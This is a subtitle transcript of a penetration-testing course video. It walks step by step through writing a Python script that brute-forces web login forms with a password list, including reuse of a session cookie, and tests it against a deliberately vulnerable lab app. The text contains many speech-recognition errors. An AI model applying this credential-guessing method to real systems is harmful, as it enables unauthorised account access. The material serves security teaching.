1
00:00:00,270 --> 00:00:00,920
Welcome back.

2
00:00:01,170 --> 00:00:06,520
In this video, we're going to be creating a brute force tool using our python skills.

3
00:00:07,080 --> 00:00:12,270
So in the previous section where we talked about the application penetration testing, we covered tools

4
00:00:12,270 --> 00:00:13,380
that are used for brute force.

5
00:00:13,770 --> 00:00:19,500
But this time, I want to see whether we can create our own tool that will be able to brute force a

6
00:00:19,500 --> 00:00:20,440
login page.

7
00:00:20,880 --> 00:00:25,340
Now, before we even start, I want to mention that this tool will not be universal.

8
00:00:25,350 --> 00:00:30,660
So for every different page, you will have to perform some minor modifications the same way that we

9
00:00:30,660 --> 00:00:33,200
did inside of our Hydra tool and inside the bubble.

10
00:00:33,540 --> 00:00:36,430
It nonetheless let us see how we can create it.

11
00:00:36,780 --> 00:00:43,530
So if I type Élysées and navigate to my desk directory here, we got the tools directory for our coding

12
00:00:43,530 --> 00:00:51,580
projects and here I'm going to create the web app test directory so I will never get there.

13
00:00:52,050 --> 00:00:54,570
And currently this directory is empty.

14
00:00:55,080 --> 00:00:56,910
So let's send our Python program.

15
00:00:56,910 --> 00:01:01,160
We can type NENO and then brute force dot p y.

16
00:01:02,670 --> 00:01:10,050
Great, now there is only one library that we are going to need to perform this project, and that library

17
00:01:10,050 --> 00:01:17,190
is the requests library, it will allow us to automate the process of sending the get and post requests.

18
00:01:17,850 --> 00:01:24,300
So let's just import it straight away and let's start our program.

19
00:01:24,810 --> 00:01:30,660
So first thing that we must think about is what are the information that we need from the user of this

20
00:01:30,660 --> 00:01:33,300
program in order to brute force a login page.

21
00:01:33,960 --> 00:01:42,330
So we will need you are a link to that page and we're going to need a user name for that specific account.

22
00:01:42,600 --> 00:01:45,690
Then we're going to run a bunch of passwords onto that user name.

23
00:01:45,870 --> 00:01:48,390
And if you manage to get the correct password, great.

24
00:01:48,390 --> 00:01:50,010
We are going to print it to the screen.

25
00:01:50,310 --> 00:01:54,790
If we don't manage to find the password, we're going to print password, not enlist.

26
00:01:55,230 --> 00:01:56,200
Simple as that.

27
00:01:56,640 --> 00:01:58,920
So let's start with those information.

28
00:01:58,920 --> 00:02:02,580
First, let's create a variable called your URL.

29
00:02:02,970 --> 00:02:08,850
And that variable is going to be the input value, which means that the user of this program can input

30
00:02:09,090 --> 00:02:11,250
which Web page they want to brute force.

31
00:02:12,090 --> 00:02:15,660
Let's open double quotes and specify that to them.

32
00:02:16,150 --> 00:02:17,250
Let's do it like this.

33
00:02:17,250 --> 00:02:18,870
Enter page.

34
00:02:19,470 --> 00:02:23,340
You are out here, they can enter the page zero.

35
00:02:23,640 --> 00:02:29,460
And right after we do that, we can create another variable called username and this variable will do

36
00:02:29,460 --> 00:02:30,060
the same thing.

37
00:02:30,060 --> 00:02:31,860
So it'll be the same input value.

38
00:02:32,190 --> 00:02:35,270
Does this time we're going to ask for the user name.

39
00:02:35,700 --> 00:02:41,340
So let's just type enter user name for the account to brute force.

40
00:02:44,760 --> 00:02:46,940
And this is pretty much it for now.

41
00:02:47,550 --> 00:02:52,800
Now, later, we are going to add some other information regarding this project, but for now we only

42
00:02:52,800 --> 00:02:53,990
need these two variables.

43
00:02:54,270 --> 00:02:56,140
So how are we going to approach this?

44
00:02:56,580 --> 00:03:04,140
Well, first, since we have the URL and the user name, we can start with opening a file that will

45
00:03:04,140 --> 00:03:07,290
contain the passwords that we are going to use to brute force.

46
00:03:07,470 --> 00:03:14,340
So we can do that with open and we can call that file passwords DOT 60.

47
00:03:14,670 --> 00:03:19,770
And this is also something that we can ask the user, for example, in the name of the password file

48
00:03:19,770 --> 00:03:22,410
to use, and that would actually be a good thing.

49
00:03:22,420 --> 00:03:27,780
So what I'm going to do is this is another information that we're going to ask from the user, which

50
00:03:27,780 --> 00:03:30,270
is password default equals input.

51
00:03:30,420 --> 00:03:31,080
And then.

52
00:03:32,100 --> 00:03:34,710
Enter password.

53
00:03:36,060 --> 00:03:41,620
File to use, simple as that, let's not forget the single quotes.

54
00:03:41,640 --> 00:03:46,800
Otherwise, this will throw us an error and let's close the brackets at the end.

55
00:03:47,400 --> 00:03:54,900
Now, we can open that fall by specifying a password file and we want to open it for reading so we can

56
00:03:54,900 --> 00:04:00,510
specify just are between the single quotes, which means opening file for reading text.

57
00:04:01,170 --> 00:04:03,530
Now here we need to specify how we want to open it.

58
00:04:03,540 --> 00:04:11,010
So with open password file as passwords, that is how we are going to call our file object.

59
00:04:12,150 --> 00:04:17,940
Then we're going to enter a function which I'm going to call cracking and dysfunction doesn't exist,

60
00:04:17,980 --> 00:04:21,630
will have to code it, but nonetheless, this function will perform.

61
00:04:21,780 --> 00:04:25,500
The brute forcing this function will take two arguments.

62
00:04:25,500 --> 00:04:31,020
The first one is going to be the user name, of course, that we specify at the beginning of the program

63
00:04:31,020 --> 00:04:31,890
execution.

64
00:04:31,890 --> 00:04:34,780
And the second argument will be the you are out.

65
00:04:36,170 --> 00:04:44,840
Great, now that we've got this, we need to create the cracking function and we're going to do it right

66
00:04:44,840 --> 00:04:52,280
here so they find cracking and we specify username and URL as the arguments that it needs.

67
00:04:52,700 --> 00:04:54,410
So how are we going to do this?

68
00:04:54,920 --> 00:04:59,650
Well, we already mentioned that we are going to perform reading of the passwords.

69
00:04:59,660 --> 00:05:06,890
So for each password in this password list, we're going to try to send our request to the page with

70
00:05:06,890 --> 00:05:08,490
that password and username.

71
00:05:08,750 --> 00:05:13,370
And if the response contains some valid argument that we have a valid username and password, we're

72
00:05:13,370 --> 00:05:16,240
going to print it to the screen as the correct username and password.

73
00:05:16,430 --> 00:05:21,680
And if we get something like log it failed or something like that, we're going to move on to the next

74
00:05:21,680 --> 00:05:22,280
password.

75
00:05:22,970 --> 00:05:24,230
So how are we going to do that?

76
00:05:24,290 --> 00:05:28,150
Well, we already open the file for reading that contains our passwords.

77
00:05:28,160 --> 00:05:34,100
And now what we can do is we can type for password in passwords.

78
00:05:35,350 --> 00:05:37,480
And remember, passwords is our file.

79
00:05:38,440 --> 00:05:45,160
Then for each password inside of that password file, we can first strip it out of any additional characters

80
00:05:45,160 --> 00:05:49,870
using these strip functions or password will be equal to password dot strip.

81
00:05:50,800 --> 00:05:56,050
This will remove any, for example, empty characters or something like that that might cause us a problem

82
00:05:56,260 --> 00:05:58,240
in brute forcing this page.

83
00:05:59,500 --> 00:06:08,140
Then once we do that, we're going to print to the screen trying and then the password that we are currently

84
00:06:08,140 --> 00:06:13,510
trying just to the user of the program can see which password is it currently trying to brute force.

85
00:06:14,350 --> 00:06:18,220
Once we do that, we need to send the request to that page.

86
00:06:18,880 --> 00:06:19,920
So how can we do that?

87
00:06:20,410 --> 00:06:23,560
Well, in this case, since we're going to brute force.

88
00:06:24,560 --> 00:06:33,530
As usual, our W a login page first, if I log out, we know that this is being sent with post form,

89
00:06:33,620 --> 00:06:37,400
so the method of sending the usernames and passwords is post.

90
00:06:37,400 --> 00:06:43,820
And we can check that once again just by finding the form and we can see that the method is post.

91
00:06:44,890 --> 00:06:49,750
That's why inside the bubble coat, we're going to type requests that post.

92
00:06:50,760 --> 00:06:57,480
And we're posting and this request, that post takes two arguments in our case, the first one is going

93
00:06:57,480 --> 00:07:03,600
to be the URL, which is logical because we need to tell our program where you want to post that data.

94
00:07:03,930 --> 00:07:09,540
And the data that we want to post will be equal to this data equals data.

95
00:07:10,450 --> 00:07:15,260
Just we don't have the data yet, we need to tell our program what is our data.

96
00:07:15,820 --> 00:07:16,850
So how can we do that?

97
00:07:17,530 --> 00:07:24,570
Well, we can go right here and find data and data has to be a dictionary inside of this dictionary.

98
00:07:24,610 --> 00:07:30,850
We have a key and the value and we need to specify all the information that the program needs in order

99
00:07:30,850 --> 00:07:33,030
to perform a successful login.

100
00:07:33,520 --> 00:07:39,100
And that information would most likely be the username, the password and the button that it has to

101
00:07:39,100 --> 00:07:39,560
click.

102
00:07:39,580 --> 00:07:41,680
Remember the same thing we had in Hidayatullah?

103
00:07:42,040 --> 00:07:46,220
We need to click on this button in order to successfully submit the username and password.

104
00:07:46,900 --> 00:07:48,550
So how can we define it right here?

105
00:07:49,060 --> 00:07:51,760
Well, we defined it like this username.

106
00:07:54,030 --> 00:07:55,200
To that username.

107
00:07:56,440 --> 00:08:02,290
And this username is just the name of the field on our page, and this is the part of the program that

108
00:08:02,290 --> 00:08:05,650
you might need to change, depending on the page that your brute forcing.

109
00:08:06,040 --> 00:08:11,620
If the user name field on the page that your brute force is called something like user, then you must

110
00:08:11,620 --> 00:08:13,390
change this to user.

111
00:08:14,240 --> 00:08:19,490
And this right here is just the username that we're sending, which is the one that we asked the user

112
00:08:19,490 --> 00:08:22,550
of the program to input at the beginning of execution.

113
00:08:23,640 --> 00:08:28,290
The same thing we must do for passwords, and the reason why I'm already typing the username fields

114
00:08:28,290 --> 00:08:35,070
is because I already know that the name of the field is username and password, because we all detect

115
00:08:35,070 --> 00:08:38,130
that in our Web application penetration testing section.

116
00:08:38,850 --> 00:08:42,450
OK, once we do that, we can do the same for password.

117
00:08:43,290 --> 00:08:49,680
And once again, we need to put the password into that password field and the password will be this

118
00:08:49,680 --> 00:08:55,500
stripped value that we read from our passwords file or from our passwords list.

119
00:08:56,400 --> 00:09:02,970
And the last argument that we need to specify is going to be the button, as you remember, once we

120
00:09:02,970 --> 00:09:08,760
send it right here, the button name is Log-in and the type of button is submit.

121
00:09:08,770 --> 00:09:11,520
So we must specify it like that just this time.

122
00:09:11,520 --> 00:09:18,350
Both of these values are going to be between the single quotes because none of them is an actual variable.

123
00:09:19,140 --> 00:09:22,200
So this is going to be our data.

124
00:09:22,530 --> 00:09:30,200
And in this requests that post, we are sending that data to our Europe and luckily our request library

125
00:09:30,210 --> 00:09:36,330
will perform everything else for us so it will know where to put this data that we are sending, of

126
00:09:36,330 --> 00:09:39,450
course, instead of just sending this data.

127
00:09:39,480 --> 00:09:43,620
We also want to store the response somewhere so we can create a response variable.

128
00:09:43,620 --> 00:09:50,610
And that response variable will be equal to whatever the return value is from data requests that post

129
00:09:50,610 --> 00:09:51,150
function.

130
00:09:51,990 --> 00:09:56,550
And the return value is going to be the double page of the response.

131
00:09:57,580 --> 00:10:02,800
Once we received the response, we have to check whether the password was correct or not.

132
00:10:03,310 --> 00:10:04,610
So how can we do that?

133
00:10:05,050 --> 00:10:09,550
Well, we can do that the same way that we did inside of our Hydra.

134
00:10:09,680 --> 00:10:16,390
Remember that in Hydra, we had to specify the string that occurs once we specified the incorrect username

135
00:10:16,390 --> 00:10:18,910
and password, which is this down here.

136
00:10:18,910 --> 00:10:20,380
As we can see, a log in failed.

137
00:10:21,190 --> 00:10:24,260
Well, we can do something similar inside of our program.

138
00:10:24,580 --> 00:10:26,590
Let's ask the user of the program.

139
00:10:26,590 --> 00:10:34,300
First, we can create a variable login failed string and we can ask the user.

140
00:10:38,010 --> 00:10:44,220
Enter a string that occurs when logging fails.

141
00:10:44,520 --> 00:10:50,880
Simple as that, and once they enter the string, hopefully they enter something like failed or log

142
00:10:50,890 --> 00:10:51,410
in failed.

143
00:10:51,420 --> 00:10:53,320
They don't have to enter the entire thing.

144
00:10:53,340 --> 00:10:56,820
They can just enter failed, which occurs on this page.

145
00:10:56,820 --> 00:11:03,480
Once you specify incorrect username and password, then what we can do is we can check whether we find

146
00:11:03,480 --> 00:11:06,680
that string inside of our response.

147
00:11:07,470 --> 00:11:13,500
Now, to do that, we must type the if statement and if statement will be something like this.

148
00:11:13,860 --> 00:11:25,800
If logging underscore failed underscores string in response that content dot decode code, then we have

149
00:11:25,800 --> 00:11:27,330
the incorrect password.

150
00:11:27,540 --> 00:11:32,820
And the reason why we're decoding this is because otherwise it won't be able to find this value inside

151
00:11:32,820 --> 00:11:33,630
of our content.

152
00:11:33,900 --> 00:11:35,430
So we must decode it first.

153
00:11:35,700 --> 00:11:41,490
And then it is basically searching for this string inside of the HTML page of the response.

154
00:11:42,480 --> 00:11:47,910
If it finds that string, that means we found the incorrect password because that occurs only when it

155
00:11:47,910 --> 00:11:51,020
is incorrect, that's why we're just going to pass.

156
00:11:51,030 --> 00:11:52,480
We're not going to do anything.

157
00:11:52,860 --> 00:12:01,470
And if it doesn't find which would be the statement, then what we can do is we can print found username.

158
00:12:06,170 --> 00:12:15,650
And we can plus the username and we can print the same thing for the passwords, so found password.

159
00:12:19,930 --> 00:12:26,770
And plus password, so this will print the current username, which is always the same, and it will

160
00:12:26,770 --> 00:12:34,060
print the current password, which is currently in this iteration of this loop, which will be the correct

161
00:12:34,060 --> 00:12:36,910
password because it didn't find this string inside of it.

162
00:12:38,020 --> 00:12:40,820
After we find it, we can just exit the program.

163
00:12:40,840 --> 00:12:45,020
There is no need to continue brute forcing so we can just exit out of the program.

164
00:12:46,210 --> 00:12:53,530
OK, now that we did this, I'll let us see whether this works, so if I go down here.

165
00:12:54,730 --> 00:13:02,770
And once we finish the cracking of the function, we can also print at the end in case it doesn't find

166
00:13:02,770 --> 00:13:08,410
anything, the password not in a list.

167
00:13:08,890 --> 00:13:10,600
So we can just do it like this.

168
00:13:10,810 --> 00:13:15,680
Once it finishes the cracking function, it will go to this statement and it will print password, not

169
00:13:15,680 --> 00:13:16,180
the list.

170
00:13:16,480 --> 00:13:21,370
If it finds the password, it will go to this statement's right here and it will exit out of the program.

171
00:13:21,380 --> 00:13:22,990
So this will never get printed.

172
00:13:24,170 --> 00:13:29,690
Let's give it a try to see whether this works, so if I could try to save and the first thing that I

173
00:13:29,690 --> 00:13:38,780
want to do is I want to copy the passwords that text file that I got on my desktop to the home, Mr.

174
00:13:38,780 --> 00:13:43,700
Hacker, desktop tools and then webapp penetration testing.

175
00:13:44,030 --> 00:13:51,590
And if I here we are going to have our passwords that the default and since this seems to be an incorrect

176
00:13:51,590 --> 00:13:56,450
password is the text file, I'm just going to delete this and I'm going to create a new one.

177
00:13:57,090 --> 00:14:02,900
Not really sure where is the last one, but let's just create it real fast so the passwords can be something

178
00:14:02,900 --> 00:14:09,110
like test, test one, two, three, one two three four five six seven, a password, one, two, three

179
00:14:09,260 --> 00:14:12,370
admin route and then the correct password.

180
00:14:12,380 --> 00:14:14,240
So we're just going to write password right here.

181
00:14:14,480 --> 00:14:19,970
And let's also write the password for the code, an account just so we can test two different accounts.

182
00:14:20,420 --> 00:14:26,500
And let's write another incorrect password at the end, which could be ABC, ABC.

183
00:14:27,170 --> 00:14:31,600
OK, this is just a test example of the program and let's control.

184
00:14:31,600 --> 00:14:36,190
Oh, and let's Python three, our brute force or dot pie.

185
00:14:36,860 --> 00:14:40,180
So the first argument that it asks is the page you are out.

186
00:14:40,400 --> 00:14:47,660
So what we can do is we can visit that page, copy the link to that page and paste it right here.

187
00:14:48,140 --> 00:14:58,190
HTP to dogbone it to the 168 fanda to two TBWA and then slash login dot click enter it asks for the

188
00:14:58,190 --> 00:15:00,060
user name for the account brute force.

189
00:15:00,170 --> 00:15:07,730
We're going to use admin the password file to use these passwords and make sure if the password file

190
00:15:07,730 --> 00:15:12,560
that you want to use is outside of the directory of your program, you will need to specify the entire

191
00:15:12,560 --> 00:15:13,870
path to that file.

192
00:15:14,540 --> 00:15:16,670
Once we do that, let's click enter.

193
00:15:16,820 --> 00:15:24,080
And it asks us for the string that the Kurzman login fails and we can just type log in failed because

194
00:15:24,080 --> 00:15:27,950
that is what occurs on our page right here for different pages.

195
00:15:27,980 --> 00:15:29,600
This will be different.

196
00:15:30,230 --> 00:15:30,980
Press enter.

197
00:15:32,060 --> 00:15:39,680
And it found the correct username and correct password, and it did it really fast, it tried these

198
00:15:39,680 --> 00:15:41,780
seven passwords, none of those worked.

199
00:15:41,790 --> 00:15:47,480
Then it went onto the password and it printed out found username and found password.

200
00:15:48,360 --> 00:15:55,200
Let's also try for the Gordon just to make sure everything works, so I'm going to pastie, I'm going

201
00:15:55,200 --> 00:15:59,610
to base the link for just type it in

202
00:16:03,150 --> 00:16:03,690
the user name.

203
00:16:03,690 --> 00:16:05,580
Is this time going to be Gordon B..

204
00:16:07,320 --> 00:16:10,170
The password's file is going to be passed for 30 60.

205
00:16:10,170 --> 00:16:17,610
And this Trink is going to be once again Log-in Fáilte Press enter and it also finds the username and

206
00:16:17,670 --> 00:16:19,790
password for that account as well.

207
00:16:20,310 --> 00:16:20,730
Great.

208
00:16:20,910 --> 00:16:30,200
Our program works, but let's also see how would we be able to brute force the inner page of this DPW,

209
00:16:30,300 --> 00:16:32,030
a program or application.

210
00:16:32,610 --> 00:16:38,810
We also got this brute force page right here, but this is something that will have to brute force differently.

211
00:16:39,060 --> 00:16:39,390
Why?

212
00:16:39,720 --> 00:16:43,620
Well, first, it requires a different type of request.

213
00:16:43,620 --> 00:16:45,090
It requires to get request.

214
00:16:45,540 --> 00:16:50,300
And the second thing is this can only be brute force within a current session.

215
00:16:50,310 --> 00:16:55,830
So if we are not logged into this page, we cannot even access this brute force page and therefore we

216
00:16:55,830 --> 00:16:56,950
cannot really brute force.

217
00:16:57,480 --> 00:17:03,240
So we must also see how we can send this session inside of our program so we can be able to brute force

218
00:17:03,360 --> 00:17:04,850
this username and password.

219
00:17:05,400 --> 00:17:06,400
Let's give it a try.

220
00:17:06,930 --> 00:17:14,820
If I go to our program and not the brute force stop Stoppie, first thing that we must specify, as

221
00:17:14,820 --> 00:17:17,660
I already said, we're going to need to specify the session.

222
00:17:17,670 --> 00:17:23,640
So we need to ask for the user for the cookie value of that session.

223
00:17:23,940 --> 00:17:28,530
And they can just read it from the person just like we did once we covered our Hydra tool.

224
00:17:28,530 --> 00:17:33,150
So we can specify right here, enter coqui value.

225
00:17:34,080 --> 00:17:39,420
And this can be optional because we don't need it always, just like we didn't need it currently.

226
00:17:39,720 --> 00:17:44,410
But if they're brute forcing something within a session, then they must specify this as well.

227
00:17:45,300 --> 00:17:51,660
Now what we can do is inside of our cracking function, right above the if statement.

228
00:17:51,660 --> 00:17:53,610
We can write another if statement.

229
00:17:53,620 --> 00:17:54,270
So if.

230
00:17:56,050 --> 00:18:03,940
Cookie value is not equal to an empty string, and if it is equal to an empty string, that means that

231
00:18:03,940 --> 00:18:05,910
the user doesn't require the cookie value.

232
00:18:06,340 --> 00:18:12,130
And in that case, it will not send the cookie value and it will just brute force without the session.

233
00:18:12,850 --> 00:18:18,280
If it is set to something, then we are going to send the cookie value inside of our request.

234
00:18:18,910 --> 00:18:26,490
So in this case, if response if cookie value is not empty, that means we must send it.

235
00:18:26,590 --> 00:18:31,630
So the response will be equal to requests that get.

236
00:18:31,840 --> 00:18:35,740
And this time we are using get because inside of this page.

237
00:18:37,210 --> 00:18:44,950
Our form is using the method get, that's why this time we're using the requests that get this is something

238
00:18:44,950 --> 00:18:48,280
that you want to change depending on the page that your brute forcing.

239
00:18:49,240 --> 00:18:55,690
So requests that get in the first parameter is going to be the URL, the second parameter, we're going

240
00:18:55,690 --> 00:19:02,260
to set our parameters, which we specify like parameters, and those parameters are going to be equal

241
00:19:02,440 --> 00:19:04,270
to, once again, a dictionary.

242
00:19:05,070 --> 00:19:08,310
And that dictionary will be rather the same like this.

243
00:19:09,590 --> 00:19:12,950
Just a few minor changes we are going to set.

244
00:19:13,910 --> 00:19:21,340
So cope with this and we're just going to paste it right here, the first change is under the button.

245
00:19:21,470 --> 00:19:27,440
So the username and password field are named the same like in our last page, as we can see right here

246
00:19:27,710 --> 00:19:28,730
inside the form.

247
00:19:28,730 --> 00:19:34,130
The name for the username is just username and the name for the password is password.

248
00:19:35,000 --> 00:19:37,550
But the login is not the same.

249
00:19:37,790 --> 00:19:44,180
We got the value for login to be login and name, for login, to also be login so we can set it like

250
00:19:44,180 --> 00:19:48,410
this login and then two dots and once again login.

251
00:19:49,300 --> 00:19:55,510
And the last parameter to this function or the last argument to this function is going to be cookies

252
00:19:56,320 --> 00:20:01,990
that are equal to a dictionary of cookie value.

253
00:20:04,500 --> 00:20:08,070
Two dots and then key value variable.

254
00:20:08,990 --> 00:20:16,190
And you can read the name of that field by going to our website and once they, for example, specified

255
00:20:16,280 --> 00:20:19,970
test and test one, two, three as our username and password here.

256
00:20:21,120 --> 00:20:23,790
And then I go and find that request inside the bubble.

257
00:20:27,130 --> 00:20:31,560
Let's find it real quick, and I believe it is this one right here.

258
00:20:31,750 --> 00:20:32,430
Here it this.

259
00:20:32,650 --> 00:20:35,700
We can see that the cookie field is named just Cookie.

260
00:20:36,490 --> 00:20:43,000
That's why we specified right here as cookie between the single quotes and we paste the cookie value

261
00:20:43,240 --> 00:20:44,050
to that field.

262
00:20:45,020 --> 00:20:46,310
Once we do all of that.

263
00:20:47,200 --> 00:20:53,620
We have all of our parameters to this function, and this seems to not be able to fit inside of my screen,

264
00:20:53,860 --> 00:20:55,090
but it doesn't matter.

265
00:20:55,100 --> 00:21:01,170
It is there and all we are left to do right now is create the statement as well.

266
00:21:03,920 --> 00:21:12,950
And the EL statement, he's going to be else in this case, we don't have the cookie value, so we can

267
00:21:12,950 --> 00:21:15,440
just copy this part of code.

268
00:21:18,160 --> 00:21:23,610
And based it right here and now we can delete it from here because we no longer need it.

269
00:21:24,010 --> 00:21:31,930
So this program is pretty much only used to brute force the main login page to the WSJ and this brute

270
00:21:31,930 --> 00:21:33,730
force page inside of the DB.

271
00:21:35,020 --> 00:21:39,490
You will need to adjust a few things right here once trying to brute force a different page, such as,

272
00:21:39,490 --> 00:21:44,620
for example, the name of the fields, the name of the cookie, and you will also have to adjust whether

273
00:21:44,620 --> 00:21:47,290
it is a get request or post request.

274
00:21:48,070 --> 00:21:50,370
Everything else I believe can stay the same.

275
00:21:51,280 --> 00:21:55,620
Now that we got our code ready, let us see whether this works.

276
00:21:55,900 --> 00:22:07,120
So if I save this and I go and try to run this, let's first of all try once again to brute force the

277
00:22:07,120 --> 00:22:14,770
main login page by typing, give it a slash login that the user name is going to be admin.

278
00:22:14,770 --> 00:22:16,780
The password file is going to be password.

279
00:22:18,340 --> 00:22:22,360
And the string that occurs is going to be login failed.

280
00:22:24,050 --> 00:22:28,640
Cookie is going to be optional, so I'm just going to press enter because I don't need it for the main

281
00:22:28,640 --> 00:22:31,790
login page and it will still manage to find it.

282
00:22:32,030 --> 00:22:35,690
But let's see whether it will manage to find the correct username and password.

283
00:22:35,870 --> 00:22:42,020
If I use the cookie value and if I brute force inside of this session, let's give it a try.

284
00:22:44,390 --> 00:22:45,580
I will enter the page.

285
00:22:45,580 --> 00:22:46,860
You are L.A. page.

286
00:22:46,860 --> 00:22:51,890
Your L is going to be the URL to this page right here, which is this.

287
00:22:52,400 --> 00:22:53,210
So let's keep.

288
00:22:55,180 --> 00:23:02,080
Paste it right here, press enter the username is going to be the same, so it is going to be admin,

289
00:23:02,410 --> 00:23:04,510
the passwords file is going to be the same.

290
00:23:05,620 --> 00:23:10,720
The string that occurs is not going to be the same, so let's give it a try and see what happens once

291
00:23:10,720 --> 00:23:13,780
we send helo username and hello as password.

292
00:23:15,440 --> 00:23:21,260
We get username and password incorrect now, we don't need to specify this entire statement, we can

293
00:23:21,260 --> 00:23:22,730
just specify incorrect.

294
00:23:23,540 --> 00:23:29,120
And if it just finds the incorrect, that means we specified the incorrect password.

295
00:23:29,120 --> 00:23:31,730
Therefore, it is going to go on to the next one.

296
00:23:31,940 --> 00:23:32,990
So let's press enter.

297
00:23:33,260 --> 00:23:36,500
And the cookie value is something that we can read from our burset.

298
00:23:36,980 --> 00:23:42,590
So let's find the request that we use to send hello and hello as username and password.

299
00:23:42,590 --> 00:23:43,640
And here it is.

300
00:23:44,450 --> 00:23:50,990
All we need to do from here is find the cookie field and copy the cookie value so security equals high

301
00:23:51,140 --> 00:23:54,850
and the session ID is set to a random value.

302
00:23:55,520 --> 00:23:59,690
All we need to do is paste that right here and press enter.

303
00:24:00,880 --> 00:24:05,770
This will start the brute forcing of our pitch, and you will notice that this time it goes a little

304
00:24:05,770 --> 00:24:11,410
bit slower because we a brute force inside of a session, let's see whether it will manage to find once

305
00:24:11,410 --> 00:24:14,290
it gets to the correct username and password.

306
00:24:15,250 --> 00:24:18,400
Let's give it a few seconds, and here it is.

307
00:24:18,550 --> 00:24:20,430
It worked successfully.

308
00:24:20,620 --> 00:24:25,710
We found the correct username, which is admin and the correct password, which is password.

309
00:24:25,720 --> 00:24:29,200
And now we can use that to log in to this page.

310
00:24:30,750 --> 00:24:33,900
As it says, welcome to the password protected area, Edman.

311
00:24:34,970 --> 00:24:37,100
So we successfully call that a brute force.

312
00:24:38,060 --> 00:24:45,860
Now you can perform some minor changes to make it even better, such as, for example, importing from

313
00:24:45,860 --> 00:24:52,250
Thurm color, import, the function colored, and this will allow us to print everything in a different

314
00:24:52,250 --> 00:24:52,610
color.

315
00:24:52,640 --> 00:24:59,360
For example, let's go down here and this first print statement we can print like this colored.

316
00:25:01,020 --> 00:25:08,280
And at the end, we specify inside of the for example, let's bring this in, Fred, we close to Brackett's

317
00:25:08,550 --> 00:25:12,890
and once we also find the correct username and password, we can print this in green.

318
00:25:13,290 --> 00:25:15,630
So print colored.

319
00:25:17,220 --> 00:25:25,530
At the end, we add comma and then green and for close to brackets, same thing we can do right here.

320
00:25:27,320 --> 00:25:30,810
And let's not forget the color function right here, so colored.

321
00:25:31,910 --> 00:25:40,190
And now if we run this by three brute force older people, let's use the regular main page, which is

322
00:25:40,230 --> 00:25:45,960
the log that BHP admin is the account password.

323
00:25:46,020 --> 00:25:47,450
That is the file.

324
00:25:47,450 --> 00:25:50,750
And failed is going to be the string that occurs.

325
00:25:51,230 --> 00:25:52,880
And it is even better right now.

326
00:25:52,880 --> 00:25:56,660
It prints the incorrect passwords in red color and fonts.

327
00:25:56,660 --> 00:25:58,970
It finds the correct username and password.

328
00:25:58,970 --> 00:26:00,290
It prints it in the green.

329
00:26:01,100 --> 00:26:03,470
Great record, the double project.

330
00:26:03,470 --> 00:26:04,790
Everything works perfectly.

331
00:26:04,790 --> 00:26:11,720
Just don't forget to change certain values inside of our program once you try this on a different Web

332
00:26:11,720 --> 00:26:12,060
page.

333
00:26:12,590 --> 00:26:18,290
The two main things that you need to keep an eye on is the name of the fields inside of our source code.

334
00:26:18,860 --> 00:26:22,900
So you just find the form and you see how the fields are named.

335
00:26:23,750 --> 00:26:25,580
Then you use that inside of your dictionary.

336
00:26:25,790 --> 00:26:31,250
And the next thing that you need to pay attention to is the method that is used to send these usernames

337
00:26:31,250 --> 00:26:34,550
and passwords, whether it is a get method or post method.

338
00:26:35,120 --> 00:26:38,440
And at last, you also need to check the name of the button.

339
00:26:38,690 --> 00:26:40,580
So this can basically be named anything.

340
00:26:40,610 --> 00:26:45,230
That's why you always need to view page source and check it out before running your program.

341
00:26:46,290 --> 00:26:46,710
Great.

342
00:26:46,950 --> 00:26:51,540
Thank you for watching this coding project, we're getting better and better in Python and in the next

343
00:26:51,540 --> 00:26:51,920
lecture.

344
00:26:51,990 --> 00:26:57,660
We're going to create another small project in Python that will be used to brute force directory names

345
00:26:57,660 --> 00:26:58,830
inside of a Web page.

346
00:26:59,130 --> 00:27:05,250
This will be a smaller program that this one, but nonetheless, it will still be a useful program that

347
00:27:05,250 --> 00:27:08,520
you will use in your penetration tests, see in the next video.